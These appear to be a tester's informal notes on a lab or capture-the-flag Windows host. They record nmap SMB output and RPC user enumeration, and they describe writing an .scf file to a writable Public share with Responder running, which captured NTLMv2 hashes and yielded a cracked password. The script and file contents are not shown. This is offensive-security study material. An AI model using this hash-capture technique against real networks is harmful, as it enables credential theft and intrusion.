SMB
PORT STATE SERVICE REASON VERSION
445/tcp open microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2.0.2
| 2.1
| 3.0
| 3.0.2
|_ 3.1.1
|_smb-print-text: false
| smb2-time:
| date: 2022-08-11T15:35:38
|_ start_date: 2022-08-11T15:33:45
| smb2-capabilities:
| 2.0.2:
| Distributed File System
| 2.1:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0.2:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.1.1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERRORSMB NULL SHARES
Was able to get a list of other users who I might be able to roast.
Unfortunately for us kerberos isnt open to the public therefore that is why we were unable to execute AESEPRoast attacks.
However after mounting hte share we were able to see the users and the permissions to these folders.
Using the followowing Script
Since we have write acess to the Public folder there is many ways that we coudl get a shell out of this, we coudl possibly steal hashes as well as possibly putting files like an hta file.
After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.
Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.
We could have additional permisisons to access other shares.
RPC
user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[amanda] rid:[0x450] user:[mrlky] rid:[0x643] user:[sizzler] rid:[0x644]
Last updated